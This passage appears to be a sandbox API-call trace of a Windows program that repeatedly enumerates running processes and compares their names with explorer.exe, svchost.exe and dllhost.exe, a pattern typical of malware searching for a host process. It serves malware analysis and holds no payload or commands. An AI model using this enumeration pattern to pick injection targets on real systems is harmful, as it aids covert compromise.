returned 1 [0226.973] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0226.973] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0226.973] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0226.973] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0226.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0226.974] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.974] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.974] CloseHandle (hObject=0xec) returned 1 [0226.974] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0226.974] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0226.974] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0226.974] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0226.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0226.975] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.975] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.975] CloseHandle (hObject=0xec) returned 1 [0226.975] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0226.975] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0226.975] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0226.975] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0226.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0226.976] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.976] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.976] CloseHandle (hObject=0xec) returned 1 [0226.976] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0226.976] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0226.976] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0226.976] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0226.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0226.977] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.977] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.977] CloseHandle (hObject=0xec) returned 1 [0226.977] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0226.977] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0226.977] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0226.977] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0226.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0226.978] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.978] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.978] CloseHandle (hObject=0xec) returned 1 [0226.978] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0226.978] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0226.978] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0226.978] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0226.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0226.978] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.978] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.978] CloseHandle (hObject=0xec) returned 1 [0226.979] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0226.979] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0226.979] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0226.979] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0226.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0226.979] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.979] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.979] CloseHandle (hObject=0xec) returned 1 [0226.979] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0226.979] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0226.979] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0226.979] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0226.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0226.980] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.980] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.980] CloseHandle (hObject=0xec) returned 1 [0226.980] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0226.980] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0226.980] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0226.980] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0226.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0226.981] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.981] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.981] CloseHandle (hObject=0xec) returned 1 [0226.981] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0226.981] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0226.981] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0226.981] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0226.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0226.982] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.982] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.982] CloseHandle (hObject=0xec) returned 1 [0226.982] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0226.982] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0226.982] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0226.982] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0226.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0226.983] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.983] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.983] CloseHandle (hObject=0xec) returned 1 [0226.983] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0226.983] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0226.983] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0226.983] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0226.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0226.983] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.984] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.984] CloseHandle (hObject=0xec) returned 1 [0226.984] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0226.984] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0226.984] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0226.984] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0226.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0226.984] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.984] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.984] CloseHandle (hObject=0xec) returned 1 [0226.984] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0226.984] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0226.985] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0226.985] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0226.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0226.985] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.985] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.985] CloseHandle (hObject=0xec) returned 1 [0226.985] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0226.985] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0226.985] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0226.985] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0226.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0226.986] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.986] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.986] CloseHandle (hObject=0xec) returned 1 [0226.986] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0226.986] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0226.986] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0226.986] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0226.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0226.987] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.987] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.987] CloseHandle (hObject=0xec) returned 1 [0226.987] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0226.987] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0226.987] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0226.987] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0226.988] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0226.988] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0226.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0226.989] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0226.990] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0226.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0226.990] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0226.991] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.991] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.991] CloseHandle (hObject=0xec) returned 1 [0226.991] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0226.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0226.992] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.992] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.992] CloseHandle (hObject=0xec) returned 1 [0226.992] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0226.992] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0226.993] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.993] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.993] CloseHandle (hObject=0xec) returned 1 [0226.993] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0226.993] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0226.994] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.994] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.994] CloseHandle (hObject=0xec) returned 1 [0226.994] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.995] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0226.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0226.995] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.995] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.995] CloseHandle (hObject=0xec) returned 1 [0226.995] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0226.996] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0226.996] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.996] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0226.996] CloseHandle (hObject=0xec) returned 1 [0226.996] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0226.996] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0226.996] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0226.996] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0226.997] CloseHandle (hObject=0xe8) returned 1 [0226.997] Sleep (dwMilliseconds=0x3e8) [0228.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0228.005] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.006] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0228.006] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0228.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0228.007] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0228.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0228.007] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0228.008] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0228.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0228.008] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0228.009] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0228.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0228.010] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0228.010] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0228.010] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0228.011] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0228.011] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: 